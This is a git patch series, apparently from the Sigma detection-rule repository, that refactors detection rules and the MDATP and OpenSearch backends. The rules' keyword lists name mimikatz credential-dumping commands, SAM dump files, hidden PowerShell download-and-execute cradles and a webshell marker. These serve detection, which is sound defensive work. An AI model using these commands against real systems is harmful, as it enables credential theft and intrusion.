b/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml index 22763a8c..416448e5 100644 --- a/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml +++ b/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml @@ -14,17 +14,16 @@ logsource: product: linux service: auditd detection: - selection1: + execve: type: 'EXECVE' - keywords|contains: 'touch' + touch: + - 'touch' selection2: - type: 'EXECVE' - keywords|contains: - '-t' - '-acmr' - '-d' - '-r' - condition: selection1 and selection2 + condition: execve and touch and selection2 falsepositives: - 'Unknown' level: medium diff --git a/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml b/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml index 71b90827..84ddd8ea 100644 --- a/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml +++ b/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml @@ -14,13 +14,12 @@ logsource: product: linux service: auditd detection: - selection1: + execve: type: 'EXECVE' - keywords|contains: 'grep' - selection2: - type: 'EXECVE' - keywords|contains: 'password' - condition: selection1 and selection2 + passwordgrep: + - 'grep' + - 'password' + condition: execve and all of passwordgrep falsepositives: - 'Unknown' level: high diff --git a/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml b/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml index 453bad91..016b26e5 100644 --- a/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml +++ b/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml @@ -17,16 +17,16 @@ logsource: product: linux service: auditd detection: - selection: + execve: type: EXECVE - keywords|contains: - - '.bash_history' - - '.zsh_history' - - '.zhistory' - - '.history' - - '.sh_history' - - 'fish_history' - condition: selection + history: + - '.bash_history' + - '.zsh_history' + - '.zhistory' + - '.history' + - '.sh_history' + - 'fish_history' + condition: execve and history fields: - a0 - a1 diff --git a/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml b/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml index 88c476d4..4aafb020 100644 --- a/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml +++ b/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml @@ -14,24 +14,20 @@ logsource: product: linux service: auditd detection: - selection1: + execve: type: 'EXECVE' - keywords|contains: - - 'shutdown' - - 'reboot' - - 'halt' - - 'poweroff' - selection2: - type: 'EXECVE' - keywords|contains: - - 'init' - - 'telinit' - selection3: - type: 'EXECVE' - keywords|contains: - - '0' - - '6' - condition: selection1 or (selection2 and selection3) + shutdowncmd: + - 'shutdown' + - 'reboot' + - 'halt' + - 'poweroff' + init: + - 'init' + - 'telinit' + initselection: + - '0' + - '6' + condition: execve and (shutdowncmd or (init and initselection)) falsepositives: - 'Legitimate administrative activity' level: informational diff --git a/rules/linux/lnx_file_copy.yml b/rules/linux/lnx_file_copy.yml index 2a0509c6..f48851eb 100644 --- a/rules/linux/lnx_file_copy.yml +++ b/rules/linux/lnx_file_copy.yml @@ -17,9 +17,8 @@ detection: - Sftp|contains: - 'sftp' filter: - message|contains|all: - - '@' - - ':' + - '@' + - ':' condition: keywords and filter falsepositives: - Legitimate administration activities diff --git a/rules/windows/builtin/win_alert_active_directory_user_control.yml b/rules/windows/builtin/win_alert_active_directory_user_control.yml index 078f02eb..8094f413 100644 --- a/rules/windows/builtin/win_alert_active_directory_user_control.yml +++ b/rules/windows/builtin/win_alert_active_directory_user_control.yml @@ -17,7 +17,7 @@ detection: selection: EventID: 4704 keywords: - Message|contains: + PrivilegeList|contains: - 'SeEnableDelegationPrivilege' condition: all of them falsepositives: diff --git a/rules/windows/builtin/win_alert_mimikatz_keywords.yml b/rules/windows/builtin/win_alert_mimikatz_keywords.yml index 1280bd76..a9d26409 100644 --- a/rules/windows/builtin/win_alert_mimikatz_keywords.yml +++ b/rules/windows/builtin/win_alert_mimikatz_keywords.yml @@ -19,17 +19,16 @@ logsource: product: windows detection: keywords: - Message|contains: - - "mimikatz" - - "mimilib" - - "<3 eo.oe" - - "eo.oe.kiwi" - - "privilege::debug" - - "sekurlsa::logonpasswords" - - "lsadump::sam" - - "mimidrv.sys" - - " p::d " - - " s::l " + - "mimikatz" + - "mimilib" + - "<3 eo.oe" + - "eo.oe.kiwi" + - "privilege::debug" + - "sekurlsa::logonpasswords" + - "lsadump::sam" + - "mimidrv.sys" + - " p::d " + - " s::l " condition: keywords falsepositives: - Naughty administrators diff --git a/rules/windows/builtin/win_av_relevant_match.yml b/rules/windows/builtin/win_av_relevant_match.yml index 6c1d18d5..fd321a9a 100644 --- a/rules/windows/builtin/win_av_relevant_match.yml +++ b/rules/windows/builtin/win_av_relevant_match.yml @@ -9,31 +9,29 @@ logsource: service: application detection: keywords: - Message|contains: - - "HTool-" - - "Hacktool" - - "ASP/Backdoor" - - "JSP/Backdoor" - - "PHP/Backdoor" - - "Backdoor.ASP" - - "Backdoor.JSP" - - "Backdoor.PHP" - - "Webshell" - - "Portscan" - - "Mimikatz" - - "WinCred" - - "PlugX" - - "Korplug" - - "Pwdump" - - "Chopper" - - "WmiExec" - - "Xscan" - - "Clearlog" - - "ASPXSpy" + - "HTool-" + - "Hacktool" + - "ASP/Backdoor" + - "JSP/Backdoor" + - "PHP/Backdoor" + - "Backdoor.ASP" + - "Backdoor.JSP" + - "Backdoor.PHP" + - "Webshell" + - "Portscan" + - "Mimikatz" + - "WinCred" + - "PlugX" + - "Korplug" + - "Pwdump" + - "Chopper" + - "WmiExec" + - "Xscan" + - "Clearlog" + - "ASPXSpy" filter: - Message|contains: - - "Keygen" - - "Crack" + - "Keygen" + - "Crack" condition: keywords and not filter falsepositives: - Some software piracy tools (key generators, cracks) are classified as hack tools diff --git a/rules/windows/builtin/win_hybridconnectionmgr_svc_running.yml b/rules/windows/builtin/win_hybridconnectionmgr_svc_running.yml index 7b0329fb..f2fb29d7 100644 --- a/rules/windows/builtin/win_hybridconnectionmgr_svc_running.yml +++ b/rules/windows/builtin/win_hybridconnectionmgr_svc_running.yml @@ -17,12 +17,12 @@ detection: - 40300 - 40301 - 40302 - Message|contains: - - 'HybridConnection' - - 'sb://' - - 'servicebus.windows.net' - - 'HybridConnectionManage' - condition: selection + keywords: + - 'HybridConnection' + - 'sb://' + - 'servicebus.windows.net' + - 'HybridConnectionManage' + condition: selection and keywords falsepositives: - Legitimate use of Hybrid Connection Manager via Azure function apps. level: high diff --git a/rules/windows/builtin/win_set_oabvirtualdirectory_externalurl.yml b/rules/windows/builtin/win_set_oabvirtualdirectory_externalurl.yml index a00956da..4a728edb 100644 --- a/rules/windows/builtin/win_set_oabvirtualdirectory_externalurl.yml +++ b/rules/windows/builtin/win_set_oabvirtualdirectory_externalurl.yml @@ -14,12 +14,11 @@ logsource: service: msexchange-management detection: selection: - Message|contains|all: - - 'Set-OabVirtualDirectory' - - 'ExternalUrl' - - 'Page_Load' - - 'script' - condition: selection + - 'Set-OabVirtualDirectory' + - 'ExternalUrl' + - 'Page_Load' + - 'script' + condition: all of selection falsepositives: - Unknown level: high diff --git a/rules/windows/builtin/win_susp_msmpeng_crash.yml b/rules/windows/builtin/win_susp_msmpeng_crash.yml index 15b527e7..c320317f 100644 --- a/rules/windows/builtin/win_susp_msmpeng_crash.yml +++ b/rules/windows/builtin/win_susp_msmpeng_crash.yml @@ -23,9 +23,8 @@ detection: Source: 'Windows Error Reporting' EventID: 1001 keywords: - Message|contains: - - 'MsMpEng.exe' - - 'mpengine.dll' + - 'MsMpEng.exe' + - 'mpengine.dll' condition: 1 of selection* and keywords falsepositives: - MsMpEng.exe can crash when C:\ is full diff --git a/rules/windows/builtin/win_susp_sam_dump.yml b/rules/windows/builtin/win_susp_sam_dump.yml index d014cb46..27304ec9 100644 --- a/rules/windows/builtin/win_susp_sam_dump.yml +++ b/rules/windows/builtin/win_susp_sam_dump.yml @@ -15,10 +15,10 @@ logsource: detection: selection: EventID: 16 - Message|contains|all: - - '\AppData\Local\Temp\SAM-' - - '.dmp' - condition: selection + keywords: + - '\AppData\Local\Temp\SAM-' + - '.dmp' + condition: selection and all of keywords falsepositives: - Penetration testing level: high diff --git a/rules/windows/builtin/win_vul_cve_2020_0688.yml b/rules/windows/builtin/win_vul_cve_2020_0688.yml index 51a0902c..0ab65759 100644 --- a/rules/windows/builtin/win_vul_cve_2020_0688.yml +++ b/rules/windows/builtin/win_vul_cve_2020_0688.yml @@ -20,8 +20,7 @@ detection: Source: MSExchange Control Panel Level: Error selection2: - Message|contains: - - '&__VIEWSTATE=' + - '&__VIEWSTATE=' condition: selection1 and selection2 falsepositives: - Unknown diff --git a/rules/windows/other/win_defender_disabled.yml b/rules/windows/other/win_defender_disabled.yml index 0dfd079c..0cd77d6d 100644 --- a/rules/windows/other/win_defender_disabled.yml +++ b/rules/windows/other/win_defender_disabled.yml @@ -51,5 +51,7 @@ logsource: detection: selection3: EventID: 7036 - Message: 'The Windows Defender Antivirus Service service entered the stopped state' - condition: selection3 \ No newline at end of file + keywords: + - 'Windows Defender Antivirus Service' + - 'stopped' + condition: selection3 and keywords \ No newline at end of file diff --git a/rules/windows/other/win_exchange_TransportAgent_failed.yml b/rules/windows/other/win_exchange_TransportAgent_failed.yml index 9cad0aea..2a68a841 100644 --- a/rules/windows/other/win_exchange_TransportAgent_failed.yml +++ b/rules/windows/other/win_exchange_TransportAgent_failed.yml @@ -14,9 +14,10 @@ logsource: product: windows detection: selection: - Message|contains: 'Install-TransportAgent' EventID: 6 - condition: selection + keywords: + - 'Install-TransportAgent' + condition: selection and keywords fields: - AssemblyPath falsepositives: diff --git a/rules/windows/other/win_possible_zerologon_exploitation_using_wellknown_tools.yml b/rules/windows/other/win_possible_zerologon_exploitation_using_wellknown_tools.yml index df511823..9a8c833f 100644 --- a/rules/windows/other/win_possible_zerologon_exploitation_using_wellknown_tools.yml +++ b/rules/windows/other/win_possible_zerologon_exploitation_using_wellknown_tools.yml @@ -16,13 +16,11 @@ logsource: product: windows detection: selection: - - EventID: '5805' - Message|contains: - - kali - - mimikatz - - EventID: '5723' - Message|contains: - - kali - - mimikatz - condition: selection + EventID: + - '5805' + - '5723' + keywords: + - kali + - mimikatz + condition: selection and keywords level: critical diff --git a/rules/windows/other/win_wmi_persistence.yml b/rules/windows/other/win_wmi_persistence.yml index bf8e8a0f..6a0d02d7 100644 --- a/rules/windows/other/win_wmi_persistence.yml +++ b/rules/windows/other/win_wmi_persistence.yml @@ -25,14 +25,14 @@ logsource: detection: wmi_filter_to_consumer_binding: EventID: 5861 - Message|contains: - - 'ActiveScriptEventConsumer' - - 'CommandLineEventConsumer' - - 'CommandLineTemplate' + consumer_keywords: + - 'ActiveScriptEventConsumer' + - 'CommandLineEventConsumer' + - 'CommandLineTemplate' # - 'Binding EventFilter' # too many false positive with HP Health Driver wmi_filter_registration: EventID: 5859 - condition: (wmi_filter_to_consumer_binding) OR (wmi_filter_registration) + condition: (wmi_filter_to_consumer_binding and consumer_keywords) or (wmi_filter_registration) --- logsource: product: windows diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml index dcf6fb16..8eec258c 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml @@ -19,10 +19,7 @@ falsepositives: level: medium detection: filter: - - ContextInfo: 'powershell.exe' - - Message: 'powershell.exe' - # Both fields contain key=value pairs where the key HostApplication is relevant but - # can't be referred directly as event field. + ContextInfo: 'powershell.exe' condition: selection and not filter --- diff --git a/rules/windows/powershell/powershell_malicious_keywords.yml b/rules/windows/powershell/powershell_malicious_keywords.yml index f46ce60b..03858d39 100644 --- a/rules/windows/powershell/powershell_malicious_keywords.yml +++ b/rules/windows/powershell/powershell_malicious_keywords.yml @@ -16,27 +16,26 @@ logsource: definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' detection: keywords: - Message|contains: - - "AdjustTokenPrivileges" - - "IMAGE_NT_OPTIONAL_HDR64_MAGIC" - - "Microsoft.Win32.UnsafeNativeMethods" - - "ReadProcessMemory.Invoke" - - "SE_PRIVILEGE_ENABLED" - - "LSA_UNICODE_STRING" - - "MiniDumpWriteDump" - - "PAGE_EXECUTE_READ" - - "SECURITY_DELEGATION" - - "TOKEN_ADJUST_PRIVILEGES" - - "TOKEN_ALL_ACCESS" - - "TOKEN_ASSIGN_PRIMARY" - - "TOKEN_DUPLICATE" - - "TOKEN_ELEVATION" - - "TOKEN_IMPERSONATE" - - "TOKEN_INFORMATION_CLASS" - - "TOKEN_PRIVILEGES" - - "TOKEN_QUERY" - - "Metasploit" - - "Mimikatz" + - "AdjustTokenPrivileges" + - "IMAGE_NT_OPTIONAL_HDR64_MAGIC" + - "Microsoft.Win32.UnsafeNativeMethods" + - "ReadProcessMemory.Invoke" + - "SE_PRIVILEGE_ENABLED" + - "LSA_UNICODE_STRING" + - "MiniDumpWriteDump" + - "PAGE_EXECUTE_READ" + - "SECURITY_DELEGATION" + - "TOKEN_ADJUST_PRIVILEGES" + - "TOKEN_ALL_ACCESS" + - "TOKEN_ASSIGN_PRIMARY" + - "TOKEN_DUPLICATE" + - "TOKEN_ELEVATION" + - "TOKEN_IMPERSONATE" + - "TOKEN_INFORMATION_CLASS" + - "TOKEN_PRIVILEGES" + - "TOKEN_QUERY" + - "Metasploit" + - "Mimikatz" condition: keywords falsepositives: - Penetration tests diff --git a/rules/windows/powershell/powershell_suspicious_download.yml b/rules/windows/powershell/powershell_suspicious_download.yml index 4677ef36..73626bb1 100644 --- a/rules/windows/powershell/powershell_suspicious_download.yml +++ b/rules/windows/powershell/powershell_suspicious_download.yml @@ -18,15 +18,12 @@ logsource: product: windows service: powershell detection: - downloadfile: - Message|contains|all: - - 'System.Net.WebClient' - - '.DownloadFile(' - downloadstring: - Message|contains|all: - - 'System.Net.WebClient' - - '.DownloadString(' - condition: downloadfile or downloadstring + webclient: + - 'System.Net.WebClient' + download: + - '.DownloadFile(' + - '.DownloadString(' + condition: webclient and download --- logsource: product: windows diff --git a/rules/windows/powershell/powershell_suspicious_invocation_specific.yml b/rules/windows/powershell/powershell_suspicious_invocation_specific.yml index 97833fc3..39da524b 100644 --- a/rules/windows/powershell/powershell_suspicious_invocation_specific.yml +++ b/rules/windows/powershell/powershell_suspicious_invocation_specific.yml @@ -13,50 +13,44 @@ logsource: service: powershell detection: convert_b64: - Message|contains|all: - - '-nop' - - ' -w ' - - 'hidden' - - ' -c ' - - '[Convert]::FromBase64String' + - '-nop' + - ' -w ' + - 'hidden' + - ' -c ' + - '[Convert]::FromBase64String' iex_selection: - Message|contains|all: - - ' -w ' - - 'hidden' - - '-noni' - - '-nop' - - ' -c ' - - 'iex' - - 'New-Object' + - ' -w ' + - 'hidden' + - '-noni' + - '-nop' + - ' -c ' + - 'iex' + - 'New-Object' enc_selection: - Message|contains|all: - - ' -w ' - - 'hidden' - - '-ep' - - 'bypass' - - '-Enc' + - ' -w ' + - 'hidden' + - '-ep' + - 'bypass' + - '-Enc' reg_selection: - Message|contains|all: - - 'powershell' - - 'reg' - - 'add' - - 'HKCU\software\microsoft\windows\currentversion\run' + - 'powershell' + - 'reg' + - 'add' + - 'HKCU\software\microsoft\windows\currentversion\run' webclient_selection: - Message|contains|all: - - 'bypass' - - '-noprofile' - - '-windowstyle' - - 'hidden' - - 'new-object' - - 'system.net.webclient' - - '.download' + - 'bypass' + - '-noprofile' + - '-windowstyle' + - 'hidden' + - 'new-object' + - 'system.net.webclient' + - '.download' iex_webclient: - Message|contains|all: - - 'iex' - - 'New-Object' - - 'Net.WebClient' - - '.Download' - condition: 1 of them + - 'iex' + - 'New-Object' + - 'Net.WebClient' + - '.Download' + condition: all of convert_b64 or all of iex_selection or all of enc_selection or all of reg_selection or all of webclient_selection or all of iex_webclient falsepositives: - Penetration tests level: high diff --git a/rules/windows/powershell/powershell_suspicious_keywords.yml b/rules/windows/powershell/powershell_suspicious_keywords.yml index c363bf38..fee321a2 100644 --- a/rules/windows/powershell/powershell_suspicious_keywords.yml +++ b/rules/windows/powershell/powershell_suspicious_keywords.yml @@ -20,18 +20,17 @@ logsource: definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277. Monitor for EventID 4104' detection: keywords: - Message|contains: - - "System.Reflection.Assembly.Load" - - "[System.Reflection.Assembly]::Load" - - "[Reflection.Assembly]::Load" - - "System.Reflection.AssemblyName" - - "Reflection.Emit.AssemblyBuilderAccess" - - "Runtime.InteropServices.DllImportAttribute" - - "SuspendThread" - - "rundll32" - - "FromBase64" - - "Invoke-WMIMethod" - - "http://127.0.0.1" + - "System.Reflection.Assembly.Load" + - "[System.Reflection.Assembly]::Load" + - "[Reflection.Assembly]::Load" + - "System.Reflection.AssemblyName" + - "Reflection.Emit.AssemblyBuilderAccess" + - "Runtime.InteropServices.DllImportAttribute" + - "SuspendThread" + - "rundll32" + - "FromBase64" + - "Invoke-WMIMethod" + - "http://127.0.0.1" condition: keywords falsepositives: - Penetration tests diff --git a/rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml b/rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml index b6595428..7b26a54e 100644 --- a/rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml +++ b/rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml @@ -19,9 +19,9 @@ logsource: service: powershell detection: selection: - Message|contains: 'ProviderName=WSMan' + - 'ProviderName=WSMan' filter: - Message|contains: 'HostApplication=*powershell' + - 'HostApplication=*powershell' condition: selection and not filter falsepositives: - Unknown diff --git a/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml b/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml index 8dd5846d..64adeae7 100644 --- a/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml +++ b/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml @@ -11,16 +11,14 @@ logsource: service: msexchange-management detection: selection_cmdlet: - Message|contains|all: - - 'OabVirtualDirectory' - - ' -ExternalUrl ' + - 'OabVirtualDirectory' + - ' -ExternalUrl ' selection_params: - Message|contains: - - 'eval(request' - - 'http://f/ Date: Thu, 12 Aug 2021 18:06:10 +0100 Subject: [PATCH 0317/1367] Enabling Linux/macOS support on MDATP, fixing incorrect parent cmd mappings --- tools/sigma/backends/mdatp.py | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/tools/sigma/backends/mdatp.py b/tools/sigma/backends/mdatp.py index eb535835..1d45b747 100644 --- a/tools/sigma/backends/mdatp.py +++ b/tools/sigma/backends/mdatp.py @@ -118,7 +118,6 @@ class WindowsDefenderATPBackend(SingleTextQueryBackend): "Image": ("InitiatingProcessFolderPath", self.default_value_mapping), "CommandLine": ("InitiatingProcessCommandLine", self.default_value_mapping), "ObjectValueName": ("RegistryValueName", self.default_value_mapping), - "ParentCommandLine": ("InitiatingProcessCommandLine", self.default_value_mapping), "ProcessName": ("InitiatingProcessFileName", self.default_value_mapping), "ParentName": ("InitiatingProcessParentFileName", self.default_value_mapping), "ParentProcessName": ("InitiatingProcessParentFileName", self.default_value_mapping), @@ -132,7 +131,6 @@ class WindowsDefenderATPBackend(SingleTextQueryBackend): "OriginUrl": ("FileOriginUrl", self.default_value_mapping), "Image": ("InitiatingProcessFolderPath", self.default_value_mapping), "CommandLine": ("InitiatingProcessCommandLine", self.default_value_mapping), - "ParentCommandLine": ("InitiatingProcessCommandLine", self.default_value_mapping), "ProcessName": ("InitiatingProcessFileName", self.default_value_mapping), "ParentName": ("InitiatingProcessParentFileName", self.default_value_mapping), "ParentProcessName": ("InitiatingProcessParentFileName", self.default_value_mapping), @@ -149,7 +147,6 @@ class WindowsDefenderATPBackend(SingleTextQueryBackend): "Image": ("InitiatingProcessFolderPath", self.default_value_mapping), "CommandLine": ("InitiatingProcessCommandLine", self.default_value_mapping), "Initiated": ("RemotePort", self.default_value_mapping), - "ParentCommandLine": ("InitiatingProcessCommandLine", self.default_value_mapping), "ProcessName": ("InitiatingProcessFileName", self.default_value_mapping), "Protocol": ("RemoteProtocol", self.default_value_mapping), "SourceIp": ("LocalIP", self.default_value_mapping), @@ -162,7 +159,7 @@ class WindowsDefenderATPBackend(SingleTextQueryBackend): "FileName": (self.id_mapping, self.default_value_mapping), "Image": ("InitiatingProcessFolderPath", self.default_value_mapping), "ImageLoaded": ("FolderPath", self.default_value_mapping), - "ParentCommandLine": ("InitiatingProcessCommandLine", self.default_value_mapping), + "CommandLine": ("InitiatingProcessCommandLine", self.default_value_mapping), "ParentProcessName": ("InitiatingProcessParentFileName", self.default_value_mapping), "ProcessName": ("InitiatingProcessFileName", self.default_value_mapping), "TargetImage": ("FolderPath", self.default_value_mapping), @@ -258,19 +255,19 @@ class WindowsDefenderATPBackend(SingleTextQueryBackend): self.product = None self.service = None - if (self.category, self.product, self.service) == ("process_creation", "windows", None): + if (self.category, self.service) == ("process_creation", None) and self.product in ['windows', 'linux', 'macos']: self.tables.append("DeviceProcessEvents") self.current_table = "DeviceProcessEvents" elif (self.category, self.product, self.service) == ("registry_event", "windows", None): self.tables.append("DeviceRegistryEvents") self.current_table = "DeviceRegistryEvents" - elif (self.category, self.product, self.service) == ("file_event", "windows", None): + elif (self.category, self.service) == ("file_event", None) and self.product in ['windows', 'linux', 'macos']: self.tables.append("DeviceFileEvents") self.current_table = "DeviceFileEvents" elif (self.category, self.product, self.service) == ("image_load", "windows", None): self.tables.append("DeviceImageLoadEvents") self.current_table = "DeviceImageLoadEvents" - elif (self.category, self.product, self.service) == ("network_connection", "windows", None): + elif (self.category, self.service) == ("network_connection", None) and self.product in ['windows', 'linux', 'macos']: self.tables.append("DeviceNetworkEvents") self.current_table = "DeviceNetworkEvents" elif (self.category, self.product, self.service) == (None, "windows", "powershell"): From 3f37ee3964761c4feb714ffaf7824658e5fd681c Mon Sep 17 00:00:00 2001 From: Young Date: Thu, 12 Aug 2021 22:40:45 -0700 Subject: [PATCH 0318/1367] created build query method --- .DS_Store | Bin 0 -> 8196 bytes tools/.DS_Store | Bin 0 -> 6148 bytes tools/osMonitor.json | 1 + tools/sigma/backends/opensearch.py | 69 ++++++++++++++++++++++++++--- 4 files changed, 64 insertions(+), 6 deletions(-) create mode 100644 .DS_Store create mode 100644 tools/.DS_Store create mode 100644 tools/osMonitor.json diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..8ec7eb62074302687bee5f8d1e0690ea3c2ceae7 GIT binary patch literal 8196 zcmeHM(QXn!6um=B3u(1A)!3Mr?2B(Lp=gYKFhL4YVy%rd`kLt3;GSVZXe9YJ%}~ zE@PI^XRg2t@QGfLLx+^16Kam3%?YD`QNSo*6fg=H1=faF-(=d~XyFR6&BRu4i`gJi9pS;NW-7UL*&31ho2%c2; zP%=NIp+&Sp1$sgyoPS7V+M)Z1vPBPY%})is6U8PDW7uo74K=oK|2t5igwYhi z3Q%gO9jS5#x^>CrXp`<$D*Yv-bc!CK_haCBe+9hg7>G3uUfQ|Bs=v6ATORdUfu5%{H|B;$T$^sAgj5n3G=lUK$GG@%vF63-Y z7FDK9SgOS+8V}Be%r!cWNzBO;=B4!{DdHh=I*d&TnL=Sk5=p7kBO03%LtG3c#-%?< zS_j8NLUnOREsU%!lWxNFi$qufgSYHBz1PvM$+Y343?jTm&0Be~R{^I{BuY~D)j=Jb z9<1UR(#PoBF(h=GhWvL^Gk_FQj96+Shm08oPFaB&6@Qi2|E1~s|ED|(6W%Cb6!@D8 zh}mMLSilH=|Bi|ehS%B_$^i-+lQ%#gK$lIh)1!OBWL#RyHe8R8jm|N{^k}{; zFXqdOR&?q}3M2*oH3j6|-9m{au5pF%{gtt|Z23<$U3woMaD;al;us_PocD(~rO#30 z8*1Bp#~TIM>BSU)1x4z;P6PZXN5#wBOS@r8Zt3Aw7)y{Fbo);47CfPB%a zRhjA&GAgdF#u_WemwYDv7nO>t7CxiPl{_+5xDD52LsX`Ucg&WwF;|{BUJ>PzQ?i8MtF1PyHVAnsy3!kResJf)mxJl{fgx21Ua|7 zoMp5=susjks~x?sYFXP?ucP5o&A}MD;zc!Egi-kK8(w3+zG{KcFvz^ zI80$N`J_NnAXMOmz3t2XKm7gqKP08Qq(D;OSt(#TgVErCCAqz|Rh;a#8QW(zF^Ov| lDuvE%$9f@K@h+Ph$1=Gf77iPW?4hMU0xCmtNrAtrzyplY?Xv&? literal 0 HcmV?d00001 diff --git a/tools/osMonitor.json b/tools/osMonitor.json new file mode 100644 index 00000000..84104dd6 --- /dev/null +++ b/tools/osMonitor.json @@ -0,0 +1 @@ +{"type": "monitor", "name": "RDP over Reverse SSH Tunnel WFP", "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", "enabled": true, "schedule": {"period": {"interval": 5, "unit": "MINUTES"}}, "inputs": [{"search": {"indices": ["opensearch-security-logs"], "query": {"size": 1, "aggregations": {}, "query": {"bool": {"should": [{"bool": {"must": [{"match": {"winlog.channel": "\"System\""}}]}}, {"bool": {"must": [{"match": {"winlog.event_id": "\"16\""}}]}}, {"bool": {"must": [{"match": {"winlog.event_data.HiveName.keyword": "*\\\\AppData\\\\Local\\\\Temp\\\\SAM*"}}]}}, {"bool": {"must": [{"match": {"winlog.event_data.HiveName.keyword": "*.dmp"}}]}}]}}}}}], "tags": ["Defense Evasion", "Lateral Movement", "T1090", "T1090.001", "T1090.002", "T1021.001"], "triggers": [{"name": "generated-trigger", "severity": "2", "condition": {"script": {"source": "ctx.results[0].hits.total.value > 0", "lang": "painless"}}, "actions": []}], "sigma_meta_data": {"rule_id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "threat": [{"tactic": {"id": "TA0005", "reference": "https://attack.mitre.org/tactics/TA0005", "name": "Defense Evasion"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}, {"tactic": {"id": "TA0008", "reference": "https://attack.mitre.org/tactics/TA0008", "name": "Lateral Movement"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}]}, "references": ["https://twitter.com/SBousseaden/status/1096148422984384514", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx"]} diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py index d202e58a..0f6ae3b0 100644 --- a/tools/sigma/backends/opensearch.py +++ b/tools/sigma/backends/opensearch.py @@ -156,16 +156,73 @@ class OpenSearchBackend(object): ''' Builds OpenSearch monitor query from translated Elastic Common Schema query. - Only supports must and must_not clauses. + Only supports must and should clauses. ''' def build_query(self, translation): - return { + translation = "(winlog.channel:\"System\" OR winlog.event_id:\"16\" AND winlog.event_data.HiveName.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\SAM* OR winlog.event_data.HiveName.keyword:*.dmp)" + # translation = "(winlog.channel:\"System\"" + parsedTranslation = translation.strip("()").split() + + if len(parsedTranslation) == 0: + return {} + + boolMappings = {"and": "must", "or": "should"} + clauses = [] + currMatches = [] + + if len(parsedTranslation) == 1 or (parsedTranslation[1].lower() == "or" and len(parsedTranslation) > 3 and parsedTranslation[3].lower() == "and"): + defaultClause = "must" + else: + defaultClause = boolMappings[parsedTranslation[1].lower()] + + currQuery = { + "bool": { + defaultClause : currMatches + } + } + prevOp = "and" if defaultClause == "must" else "or" + + for index in range(0, len(parsedTranslation)-1, 2): + element = parsedTranslation[index] + nextElement = parsedTranslation[index+1].lower() + + currMatches.append({ + "match": { + element.split(":")[0]: element.split(":")[1] + } + }) + + if nextElement != prevOp: + clauses.append(currQuery) + currMatches = [] + + if nextElement == "or" and index+3 < len(parsedTranslation) and parsedTranslation[index+3].lower() == "or": + nextClause = "should" + else: + nextClause = "must" + + currQuery = { "bool": { - "must": { - "match_all": translation - } + nextClause : currMatches } } + + prevOp = nextElement + + currMatches.append({ + "match": { + parsedTranslation[-1].split(":")[0]: parsedTranslation[-1].split(":")[1] + } + }) + clauses.append(currQuery) + + if len(clauses) > 1: + return { + "bool": { + "should": clauses + } + } + return clauses[0] ''' Builds inputs field of OS monitor. @@ -174,7 +231,7 @@ class OpenSearchBackend(object): return [ { "search": { - "index": MONITOR_INDICES, + "indices": MONITOR_INDICES, "query": { "size": NUM_RESULTS, "aggregations": {}, From 900d149512d54336ead0dfaf4fb63c7333d76ca1 Mon Sep 17 00:00:00 2001 From: Young Date: Fri, 13 Aug 2021 00:42:26 -0700 Subject: [PATCH 0319/1367] finished functionality for building flat queries --- tools/osMonitor.json | 2 +- tools/sigma/backends/opensearch.py | 85 +++++++++++++++--------------- 2 files changed, 43 insertions(+), 44 deletions(-) diff --git a/tools/osMonitor.json b/tools/osMonitor.json index 84104dd6..80a0c98d 100644 --- a/tools/osMonitor.json +++ b/tools/osMonitor.json @@ -1 +1 @@ -{"type": "monitor", "name": "RDP over Reverse SSH Tunnel WFP", "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", "enabled": true, "schedule": {"period": {"interval": 5, "unit": "MINUTES"}}, "inputs": [{"search": {"indices": ["opensearch-security-logs"], "query": {"size": 1, "aggregations": {}, "query": {"bool": {"should": [{"bool": {"must": [{"match": {"winlog.channel": "\"System\""}}]}}, {"bool": {"must": [{"match": {"winlog.event_id": "\"16\""}}]}}, {"bool": {"must": [{"match": {"winlog.event_data.HiveName.keyword": "*\\\\AppData\\\\Local\\\\Temp\\\\SAM*"}}]}}, {"bool": {"must": [{"match": {"winlog.event_data.HiveName.keyword": "*.dmp"}}]}}]}}}}}], "tags": ["Defense Evasion", "Lateral Movement", "T1090", "T1090.001", "T1090.002", "T1021.001"], "triggers": [{"name": "generated-trigger", "severity": "2", "condition": {"script": {"source": 